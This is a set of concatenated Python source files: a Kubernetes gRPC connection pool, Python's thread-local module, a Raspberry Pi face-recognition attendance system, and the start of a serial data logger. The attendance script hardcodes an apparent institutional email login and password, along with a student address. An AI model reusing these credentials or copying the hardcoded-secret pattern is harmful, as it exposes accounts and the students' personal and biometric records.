class K8sGrpcConnectionPool(GrpcConnectionPool):
"""
Manages grpc connections to replicas in a K8s deployment.
:param namespace: K8s namespace to operate in
:param client: K8s client
:param logger: the logger to use
"""
def __init__(
self,
namespace: str,
client: 'kubernetes.client.CoreV1Api',
logger: JinaLogger = None,
):
super().__init__(logger=logger, on_demand_connection=False)
self._namespace = namespace
self._deployment_clusteraddresses = {}
self._k8s_client = client
self._k8s_event_queue = asyncio.Queue()
self.enabled = False
self._fetch_initial_state()
from kubernetes import watch
self._api_watch = watch.Watch()
self.update_thread = Thread(target=self.run, daemon=True)
def _fetch_initial_state(self):
namespaced_pods = self._k8s_client.list_namespaced_pod(self._namespace)
for item in namespaced_pods.items:
self._process_item(item)
def start(self):
"""
Subscribe to the K8s API and watch for changes in Pods
"""
self._loop = get_or_reuse_loop()
self._process_events_task = asyncio.create_task(self._process_events())
self.update_thread.start()
async def _process_events(self):
while self.enabled:
event = await self._k8s_event_queue.get()
self._process_item(event)
def run(self):
"""
Subscribes to MODIFIED events from the list_namespaced_pod K8s API
"""
self.enabled = True
while self.enabled:
for event in self._api_watch.stream(
self._k8s_client.list_namespaced_pod, self._namespace
):
if event['type'] == 'MODIFIED':
asyncio.run_coroutine_threadsafe(
self._k8s_event_queue.put(event['object']), self._loop
)
if not self.enabled:
break
def close(self):
"""
Closes the connection pool
"""
self.enabled = False
self._process_events_task.cancel()
self._api_watch.stop()
super().close()
def send_message(self, msg: Message, target_address: str):
"""
Send msg to target_address via one of the pooled connections.
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
host, port = target_address.split(':')
# host can be a domain instead of IP Address, resolve it to IP Address
return super().send_message(msg, f'{socket.gethostbyname(host)}:{port}')
@staticmethod
def _pod_is_up(item):
return item.status.pod_ip is not None and item.status.phase == 'Running'
@staticmethod
def _pod_is_ready(item):
return item.status.container_statuses is not None and all(
cs.ready for cs in item.status.container_statuses
)
def _process_item(self, item):
deployment_name = item.metadata.labels["app"]
is_deleted = item.metadata.deletion_timestamp is not None
if not is_deleted and self._pod_is_up(item) and self._pod_is_ready(item):
if deployment_name in self._deployment_clusteraddresses:
self._add_pod_connection(deployment_name, item)
else:
try:
cluster_ip, port = self._find_cluster_ip(deployment_name)
if cluster_ip:
self._deployment_clusteraddresses[
deployment_name
] = f'{cluster_ip}:{port}'
self._connections[f'{cluster_ip}:{port}'] = ConnectionList(port)
self._add_pod_connection(deployment_name, item)
else:
self._logger.debug(
f'Observed state change in unknown deployment {deployment_name}'
)
except (KeyError, ValueError):
self._logger.debug(
f'Ignoring changes to non-Jina resource {item.metadata.name}'
)
elif (
is_deleted
and self._pod_is_up(item)
and deployment_name in self._deployment_clusteraddresses
):
self._remove_pod_connection(deployment_name, item)
def _remove_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Removing connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
self._connections[
self._deployment_clusteraddresses[deployment_name]
].remove_connection(f'{target}:{connection_pool.port}')
def _add_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if not connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Adding connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
connection_pool.add_connection(
f'{target}:{connection_pool.port}',
self._create_connection(target=f'{target}:{connection_pool.port}'),
)
def _extract_app(self, service_item):
if service_item.metadata.annotations:
return ast.literal_eval(
list(service_item.metadata.annotations.values())[0]
)['spec']['selector']['app']
elif service_item.metadata.labels:
return service_item.metadata.labels['app']
return None
def _find_cluster_ip(self, deployment_name):
service_resp = self._k8s_client.list_namespaced_service(self._namespace)
for s in service_resp.items:
app = self._extract_app(s)
if app and deployment_name == app and s.spec.cluster_ip:
# find the port-in for this deployment
for p in s.spec.ports:
if p.name == 'port-in':
return s.spec.cluster_ip, p.port
return None, None
def is_remote_local_connection(first: str, second: str):
"""
Decides whether ``first`` is a remote host and ``second`` is localhost
:param first: the ip or host name of the first runtime
:param second: the ip or host name of the second runtime
:return: True, if first is remote and second is local
"""
try:
first_ip = ipaddress.ip_address(first)
first_global = first_ip.is_global
except ValueError:
if first == 'localhost':
first_global = False
else:
first_global = True
try:
second_ip = ipaddress.ip_address(second)
second_local = second_ip.is_private or second_ip.is_loopback
except ValueError:
if second == 'localhost':
second_local = True
else:
second_local = False
return first_global and second_local
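# For example (a quick sanity check of the decision logic above):
#
# assert is_remote_local_connection('8.8.8.8', 'localhost')      # global -> local
# assert not is_remote_local_connection('localhost', '8.8.8.8')  # local -> global
# assert not is_remote_local_connection('127.0.0.1', '127.0.0.1')  # loopback -> loopback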
def get_connect_host(
bind_host: str,
bind_expose_public: bool,
connect_args: Namespace,
) -> str:
"""
Compute the host address for ``connect_args``
:param bind_host: the ip for binding
:param bind_expose_public: True, if bind socket should be exposed publicly
:param connect_args: configuration for the host ip connection
:return: host ip
"""
runs_in_docker = connect_args.runs_in_docker
# by default __default_host__ is 0.0.0.0
# is BIND at local
bind_local = bind_host == __default_host__
# is CONNECT at local
conn_local = connect_args.host == __default_host__
# is CONNECT inside docker?
# check if `uses` has 'docker://' or,
# it is a remote pea managed by jinad. (all remote peas are inside docker)
conn_docker = (
(
getattr(connect_args, 'uses', None) is not None
and (
connect_args.uses.startswith('docker://')
or connect_args.uses.startswith('jinahub+docker://')
)
)
or not conn_local
or runs_in_docker
)
# is BIND & CONNECT all on the same remote?
bind_conn_same_remote = (
not bind_local and not conn_local and (bind_host == connect_args.host)
)
# pod1 in local, pod2 in local (conn_docker if pod2 in docker)
if bind_local and conn_local:
return __docker_host__ if conn_docker else __default_host__
# pod1 and pod2 are remote but they are in the same host (pod2 is local w.r.t pod1)
if bind_conn_same_remote:
return __docker_host__ if conn_docker else __default_host__
if bind_local and not conn_local:
# in this case we are telling CONN (at remote) our local ip address
if connect_args.host.startswith('localhost'):
# this is for the "pseudo" remote tests to pass
return __docker_host__
return get_public_ip() if bind_expose_public else get_internal_ip()
else:
# in this case we (at local) need to know about remote the BIND address
return bind_host
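# For example (illustrative Namespace values; per the comment above,
# __default_host__ is 0.0.0.0):
#
# get_connect_host('0.0.0.0', False,
#                  Namespace(host='1.2.3.4', runs_in_docker=False, uses=None))
# # local BIND, remote CONNECT, not exposed publicly -> returns get_internal_ip()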
def create_connection_pool(args: 'Namespace') -> ConnectionPool:
"""
Creates the appropriate connection pool based on args
:param args: Arguments for this pod
:return: A connection pool object
"""
if args.k8s_namespace and args.k8s_connection_pool:
from jina.peapods.pods.k8slib.kubernetes_client import K8sClients
k8s_clients = K8sClients()
return K8sGrpcConnectionPool(
namespace=args.k8s_namespace,
client=k8s_clients.core_v1,
)
else:
return GrpcConnectionPool()
|
_threading_local.py | """Thread-local objects
(Note that this module provides a Python version of the
threading.local class. Depending on the version of Python you're
using, there may be a faster one available. You should always import
the local class from threading.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
# Threading import is at end
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = '_local__key', 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
currentThread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = currentThread().__dict__.get(key)
if d is None:
d = {}
currentThread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__():
threading_enumerate = enumerate
__getattribute__ = object.__getattribute__
def __del__(self):
key = __getattribute__(self, '_local__key')
try:
threads = list(threading_enumerate())
except:
# if enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
return __del__
__del__ = __del__()
try:
from threading import currentThread, enumerate, RLock
except ImportError:
from dummy_threading import currentThread, enumerate, RLock
|
eexec2.py | import RPi.GPIO as GPIO
import time
import picamera
import face_recognition.api as face_recognition
import os,shutil
import json
import numpy
from PIL import Image
from datetime import date,datetime
import smtplib
import random
import math
import openpyxl
from openpyxl.styles import Font
import cv2
from time import sleep
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import tkinter as tk
from PIL import Image,ImageEnhance
import face_recognition
from resizeimage import resizeimage
import tflite_runtime.interpreter as tflite
import argparse
import numpy as np
import sys
from threading import Thread
import importlib.util
import schedule
import threading
import socket
import tqdm
day=int(date.today().day)
def extract_count(gpath,epath,filename):
print("in extract")
image = face_recognition.load_image_file(gpath)
face_locations = face_recognition.face_locations(image,number_of_times_to_upsample=0)
count=len(face_locations)
if count==0:
img=Image.open(gpath)
l=img.size
m=max(l)
img.save(gpath,img.format)
out=Image.open(gpath)
out=out.rotate(270)
out.save(gpath)
image = face_recognition.load_image_file(gpath)
face_locations = face_recognition.face_locations(image)
count=len(face_locations)
if count>0:
i=0
for face_location in face_locations:
i=i+1
top, right, bottom, left = face_location
face_image = image[top:bottom, left:right]
pil_image = Image.fromarray(face_image)
name =filename+ "-"+str(i) +'.png'
pil_image.save(epath+name)
print("exiting extract")
return count
def match(current_img,temppath,erpath,jsonpath,excelpath):
print("in match")
now = datetime.now()
time=str(now.strftime("%I:%M %p"))
data = open(jsonpath,"r")
n=data.read()
originallist=json.loads(n)
for i in originallist:
originallist[i]=numpy.asarray(originallist[i])
l=[]
for a in range(0,2):
extractedlist=[]
for filename in os.listdir(temppath):
sublist=[]
filename=str(filename)
sublist.append(filename)
file_path=temppath+filename
image=face_recognition.load_image_file(file_path)
image_encoding=face_recognition.face_encodings(image,num_jitters=5)
if len(image_encoding)>0:
image_encoding=image_encoding[0]
sublist.append(image_encoding)
extractedlist.append(sublist)
else:
shutil.move(temppath+filename,erpath)
se1("Error! Please retake the photo")
for key in originallist:
rollno=key[0:20]
if rollno in l:
continue
for esublist in extractedlist:
oimg=originallist[key]
eimg=esublist[1]
result=face_recognition.compare_faces([oimg],eimg,tolerance=0.435)
if result[0]== True:
os.remove(temppath+esublist[0])
l.append(rollno)
extractedlist.remove(esublist)
break
for temp_img in os.listdir(temppath):
os.remove(temppath+str(temp_img))
for err_img in os.listdir(erpath):
os.remove(erpath+str(err_img))
print("exiting match")
return l
def mail(email,name):
print("in mail")
now = datetime.now()
time=str(now.strftime("%I:%M %p"))
content = '\nHello '+name+'\n Thank you for using Face recognition based attendance,\n Your timestamp has been recorded at '+time+'.\n Thank you'
username = "attendance@nmrec.edu.in"
password = "nmrec@frba"
sender = "attendance@nmrec.edu.in"
recipient = email
mail = smtplib.SMTP("smtp.gmail.com",587)
mail.ehlo()
mail.starttls()
mail.ehlo()
mail.login(username,password)
header = 'To:' + recipient + '\n' + 'From:' + sender + '\n' + 'Subject: Time Stamp Recorded \n'
content = header+content
mail.sendmail(sender,recipient,content)
mail.close()
print("exiting mail")
return(0)
def comput(ws,day,c,l,wb,excelpath):
print("in comput")
day=int(date.today().day)
mnth=str(date.today().month)
if(int(mnth)<10):
mnth=str('0'+mnth)
yr=str(date.today().year)
today = str(date.today())
name = []
email = []
now = datetime.now()
time=str(now.strftime("%I:%M %p"))
ws=wb.active
ws.column_dimensions['A'].width = 30
ws.column_dimensions['B'].width = 30
ws.column_dimensions['C'].width = 30
ws.row_dimensions[1].height = 38
ws['A1'].font = Font(bold=True)
ws['B1'].font = Font(bold=True)
max_col = ws.max_column
m_row = ws.max_row
if(ws.cell(row = 1,column = max_col+1).value == None):
ws.cell(row =1 ,column = max_col+1).value = "IN-TIME"
ws.cell(row =1 ,column = max_col+2).value = "OUT-TIME"
for i in range(2, m_row + 1):
for j in l:
if(ws.cell(row = i, column = 1).value == j):
while True:
if(ws.cell(row = i , column = c+1).value == None):
ws.cell(row = i, column = c+1).value = time
na = ws.cell(row = i, column = 2).value
name.append(na)
Mail = str(ws.cell(row = i, column = 3).value)
email.append(Mail)
break
else:
c+=1
if(day > 0 and day < 16):
wb.save(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
cur_sheetpath=str(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
else:
wb.save(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
cur_sheetpath=str(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
if l:
i=0
for m in email:
t=threading.Thread(target=mail, args=(m,name[i]))
t.start()
t.join()
i+=1
msg = str(','.join(l))+':'+str(','.join(name))
else:
msg = "Image not found!,Please retake image"
print(msg)
print("exiting comput")
return msg
def create_sheet(l,excelpath):
print("in create sheet")
day=int(date.today().day)
mnth=str(date.today().month)
if(int(mnth)<10):
mnth=str('0'+mnth)
yr=str(date.today().year)
today = str(date.today())
if(day == 1 or day == 16):
print("new excel sheet")
wb = openpyxl.Workbook()
ws = wb.active
ws.title = today
wb_temp = openpyxl.load_workbook(excelpath+"/template.xlsx")
ws_temp = wb_temp.active
m_column = ws_temp.max_column
m_row = ws_temp.max_row
for i in range(1, m_row + 1):
for j in range(1,m_column+1):
ws.cell(row = i, column = j).value = ws_temp.cell(row = i, column = j).value
wb.save(excelpath+today+".xlsx")
l=comput(ws,day,m_column,l,wb,excelpath)
elif(day > 1 and day < 16):
try:
wb = openpyxl.load_workbook(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
ws = wb.active
except:
wb = openpyxl.Workbook()
ws = wb.active
wb.save(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
wb_temp = openpyxl.load_workbook(excelpath+"/template.xlsx")
ws_temp = wb_temp.active
m_column = ws_temp.max_column
list = wb.sheetnames
if(today in list):
ws = wb[today]
else:
wb.create_sheet(index = 0 , title = today)
ws = wb.active
m_row = ws_temp.max_row
for i in range(1, m_row + 1):
for j in range(1,m_column+1):
ws.cell(row = i, column = j).value = ws_temp.cell(row = i, column = j).value
wb.save(excelpath+yr+"-"+mnth+"-"+"01"+".xlsx")
l=comput(ws,day,m_column,l,wb,excelpath)
else:
try:
wb = openpyxl.load_workbook(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
ws = wb.active
except:
wb = openpyxl.Workbook()
ws = wb.active
wb.save(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
wb_temp = openpyxl.load_workbook(excelpath+"/template.xlsx")
ws_temp = wb_temp.active
m_column = ws_temp.max_column
list = wb.sheetnames
if(today in list):
ws = wb[today]
else:
wb.create_sheet(index = 0 , title = today)
ws = wb.active
m_row = ws_temp.max_row
for i in range(1, m_row + 1):
for j in range(1,m_column+1):
ws.cell(row = i, column = j).value = ws_temp.cell(row = i, column = j).value
wb.save(excelpath+yr+"-"+mnth+"-"+"16"+".xlsx")
l=comput(ws,day,m_column,l,wb,excelpath)
print("exiting createsheet")
return l
def compute():
face_cascade = cv2.CascadeClassifier('Cascades/haarcascade_frontalface_default.xml')
project=os.getcwd()+"/"
default=project+"images/"
if not os.path.isdir(str(default)):
os.mkdir(str(default))
erpath=str(default+"error/")
if not os.path.isdir(erpath):
os.mkdir(erpath)
excelpath=str(default+"excel/")
if not os.path.isdir(excelpath):
os.mkdir(excelpath)
opath=str(default+"original/")
if not os.path.isdir(opath):
os.mkdir(str(default+"original/"))
dailypath=str(default+"daily/")
if not os.path.isdir(dailypath):
os.mkdir(dailypath)
temppath=str(default+"temporary/")
if not os.path.isdir(temppath):
os.mkdir(temppath)
jsonpath=str(default+"/original.json")
foldername=str(date.today())
filename=""
i=1
while(i):
todayfolder=str(dailypath+foldername+"/")
if not os.path.isdir(todayfolder):
os.mkdir(todayfolder)
fpath1=todayfolder+"/"+str(i)+".png"
if(os.path.isfile(fpath1)):
i+=1
continue
else:
filename=fpath1
tempfile = str(i)
break
camera=picamera.PiCamera()
camera.start_preview()
sleep(3)
camera.capture('test.png')
camera.stop_preview()
camera.close()
im=Image.open('test.png')
width, height=im.size
left= (width-600)/2
top=(height-600)/2
right=(width+600)/2
bottom=(height+720)/2
im=im.crop((left,top,right,bottom))
im.save(filename)
hi=tf()
if hi==1:
f="please retake image"
return(f)
else:
extract_count(filename,temppath,tempfile)
l=match(filename,temppath,erpath,jsonpath,excelpath)
msg = create_sheet(l,excelpath)
se(msg)
def se(ms):
root=tk.Tk()
t=str(ms)
t = t.replace(':',':\n') #newline after colons so the fallback label wraps
x=t.split(':')
if x[0]:
try:
l=tk.Label(root,text="Time stamp recorded for:\n"+x[0]+'\n'+x[1],font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
except:
l=tk.Label(root,text=t,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
else:
l=tk.Label(root,text=t,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
root.attributes('-fullscreen',True)
if x[0]:
root.after(5000,lambda: root.destroy())
root.mainloop()
return(0)
def se1(ms):
root=tk.Tk()
t=str(ms)
if "ensor" in t:
try:
x=tk.StringVar()
x.set(t+'\n Please move towards Sensor')
l=tk.Label(root,textvariable=x,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
except:
l=tk.Label(root,text=t,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
else:
l=tk.Label(root,text=t,font=("Times New Roman",28),fg='red')
l.place(relx=0.5,rely=0.5,anchor='center')
root.attributes('-fullscreen',True)
root.after(1000,lambda: root.destroy())
root.mainloop()
return(0)
def sendmail():
try:
while True:
fromaddr = "attendance@nmrec.edu.in"
toaddr = "18b61a05d6@nmrec.edu.in"
msg = MIMEMultipart()
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Subject of the Mail"
body = "Body_of_the_mail"
msg.attach(MIMEText(body, 'plain'))
day=int(date.today().day)
mnth=str(date.today().month)
if(int(mnth)<10):
mnth=str('0'+mnth)
yr=str(date.today().year)
today = str(date.today())
print("intry")
print(yr+"-"+mnth+"-")
if day<=15:
filename = os.getcwd()+"/images/excel/"+yr+"-"+mnth+"-"+"01.xlsx"
else:
filename = os.getcwd()+"/images/excel/"+yr+"-"+mnth+"-"+"16.xlsx"
import pandas as pd
empty=os.getcwd()+"/images/excel/Empty_File.xlsx"
data=pd.read_excel(filename,sheet_name=today)
data.to_excel(empty,sheet_name='temporary')
attachment = open(empty,"rb")
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
encoders.encode_base64(p)
p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
msg.attach(p)
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(fromaddr, "nmrec@frba")
text = msg.as_string()
s.sendmail(fromaddr, toaddr, text)
s.quit()
print ("Email sent at:")
print(current_time)
break
except:
print("There is no worksheet for today")
def tf():
print("In object")
parser = argparse.ArgumentParser()
parser.add_argument('--model', help='Provide the path to the TFLite file, default is models/model.tflite',
default='models/model.tflite')
parser.add_argument('--labels', help='Provide the path to the Labels, default is models/labels.txt',
default='models/labels.txt')
parser.add_argument('--image', help='Name of the single image to perform detection on',
default='test.png')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
args = parser.parse_args()
PATH_TO_MODEL_DIR = args.model
PATH_TO_LABELS = args.labels
IMAGE_PATH = args.image
MIN_CONF_THRESH = float(args.threshold)
start_time = time.time()
interpreter = tflite.Interpreter(model_path=PATH_TO_MODEL_DIR)
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
end_time = time.time()
elapsed_time = end_time - start_time
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
frame_rate_calc = 1
freq = cv2.getTickFrequency()
current_count=0
t1 = cv2.getTickCount()
image = cv2.imread(IMAGE_PATH)
image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
imH, imW, _ = image.shape
image_resized = cv2.resize(image_rgb, (width, height))
input_data = np.expand_dims(image_resized, axis=0)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
boxes = interpreter.get_tensor(output_details[0]['index'])[0]
classes = interpreter.get_tensor(output_details[1]['index'])[0]
scores = interpreter.get_tensor(output_details[2]['index'])[0]
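#Note: these are the standard SSD-style TFLite detection outputs:
#boxes[i] holds normalized [ymin, xmin, ymax, xmax] coordinates in [0, 1]
#(scaled by the image height/width below), classes[i] indexes into the
#labels list, and scores[i] is the detection confidence.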
detected = set()
for i in range(len(scores)):
if ((scores[i] > MIN_CONF_THRESH) and (scores[i] <= 1.0)):
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cv2.rectangle(image, (xmin,ymin), (xmax,ymax), (10, 255, 0), 2)
object_name = labels[int(classes[i])]
detected.add(object_name)
label = '%s: %d%%' % (object_name, int(scores[i]*100))
current_count+=1
print("Exiting object detection")
#flag the capture for retake if any disallowed object (phone/paper/ipad) was detected
if detected & {'phone', 'paper', 'ipad'}:
return(1)
else:
return(0)
def sendr():
if(day > 0 and day < 16):
src=os.getcwd()+"/images/excel/2021-01-01.xlsx"
dst=os.getcwd()
shutil.copy(src, dst)
else:
src=os.getcwd()+"/images/excel/2021-01-16.xlsx"
dst=os.getcwd()
shutil.copy(src, dst)
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 4096
host = "192.168.0.104" #Static ip of server(localserver)
port = 5002 #device1 will have this port
import openpyxl as xl;
if(day > 0 and day < 16):
filename =os.getcwd()+"/2021-01-01.xlsx"
else:
filename =os.getcwd()+"/2021-01-16.xlsx"
wb1 = xl.load_workbook(filename)
ws1 = wb1.worksheets[0]
filename1 =os.getcwd()+"/Emp2.xlsx"
wb2 = xl.load_workbook(filename1)
ws2 = wb2.active
mr = ws1.max_row
mc = ws1.max_column
for i in range (1, mr + 1):
for j in range (1, mc + 1):
c = ws1.cell(row = i, column = j)
ws2.cell(row = i, column = j).value = c.value
wb2.save(str(filename1))
filename = "Emp2.xlsx"
filesize = os.path.getsize(filename)
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(f"[+] Connecting to {host}:{port}")
s.connect((host, port))
print("[+] Connected.")
s.send(f"{filename}{SEPARATOR}{filesize}".encode())
progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "rb") as f:
for _ in progress:
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
break
s.sendall(bytes_read)
progress.update(len(bytes_read))
s.close()
recvr()
def recvr():
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5005
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
s = socket.socket()
try:
s.bind((SERVER_HOST, SERVER_PORT))
except:
o="Unable to bind"
return o
while True:
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
client_socket, address = s.accept()
print(f"[+] {address} is connected.")
recd = client_socket.recv(BUFFER_SIZE)
try:
received = recd.decode()
except:
u="Unable to recieve, Please retake image"
print(u)
return u
filename, filesize = received.split(SEPARATOR)
filesize = int(filesize)
progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for _ in progress:
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
break
f.write(bytes_read)
progress.update(len(bytes_read))
break
s.close()
print("server closed")
if(day > 0 and day < 16):
import openpyxl as xl;
filename ="source.xlsx"
wb1 = xl.load_workbook(filename)
ws1 = wb1.worksheets[0]
if(day > 0 and day < 16):
filename1 =os.getcwd()+"/images/excel/2021-01-01.xlsx"
else:
filename1 =os.getcwd()+"/images/excel/2021-01-16.xlsx"
wb2 = xl.load_workbook(filename1)
ws2 = wb2.worksheets[0]
mr = ws1.max_row
mc = ws1.max_column
for i in range (1, mr + 1):
for j in range (1, mc + 1):
c = ws1.cell(row = i, column = j)
ws2.cell(row = i, column = j).value = c.value
wb2.save(str(filename1))
else:
import openpyxl as xl;
filename ="source.xlsx"
wb1 = xl.load_workbook(filename)
ws1 = wb1.worksheets[0]
filename1 =os.getcwd()+"/images/excel/2021-01-16.xlsx"
wb2 = xl.load_workbook(filename1)
ws2 = wb2.worksheets[0]
mr = ws1.max_row
mc = ws1.max_column
for i in range (1, mr + 1):
for j in range (1, mc + 1):
c = ws1.cell(row = i, column = j)
ws2.cell(row = i, column = j).value = c.value
wb2.save(str(filename1))
TRIG=21
ECHO=20
GPIO.setmode(GPIO.BCM)
def place():
dailypath=os.getcwd()+"/images/daily/"
shutil.rmtree(dailypath)
schedule.every().saturday.at("17:35").do(place)
schedule.every().day.at("11:00").do(sendr)
schedule.every().day.at("17:00").do(sendr)
schedule.every().day.at("11:02").do(sendmail)
schedule.every().day.at("17:02").do(sendmail)
now = datetime.now()
current_time=now.strftime("%H:%M:%S")
if (current_time=="16:55:00" or current_time=="11:00:00"):
sendmail()
while True:
se1("Distance measurement in progress")
GPIO.setup(TRIG,GPIO.OUT)
GPIO.setup(ECHO,GPIO.IN)
GPIO.output(TRIG,False)
time.sleep(0.2)
GPIO.output(TRIG,True)
time.sleep(0.00001)
GPIO.output(TRIG,False)
while GPIO.input(ECHO)==0:
pulse_start=time.time()
while GPIO.input(ECHO)==1:
pulse_end=time.time()
pulse_duration=pulse_end-pulse_start
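#speed of sound is ~34300 cm/s and the echo travels out and back,
#so distance in cm = pulse_duration * (34300 / 2) = pulse_duration * 17150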
distance=pulse_duration*17150
distance=round(distance,2)
se1(distance)
time.sleep(2)
if(distance <115):
compute()
else:
schedule.run_pending()
se1("\nPlease move towards the sensor") |
data_collection_class.py | import serial
import RPi.GPIO as gpio
import time
import pandas as pd
import threading
import numpy as np
class data_collection:
def __init__(self, coms_chan, ouput_csv, cols):
self.ouput_csv = ouput_csv # name of output csv file
self.ser = serial.Serial(coms_chan, 9600, timeout=30) # establish comms connection
self.lock = threading.Lock() # Create thread locking object
self.cols = cols
self.df = pd.DataFrame(columns=cols) # creates empty dataframe
print('starting comms thread')
self.running = True # used to enable or disable the thread (when True, loops to infinity)
self.listen_thread = threading.Thread(target=self.waiting_for_data)
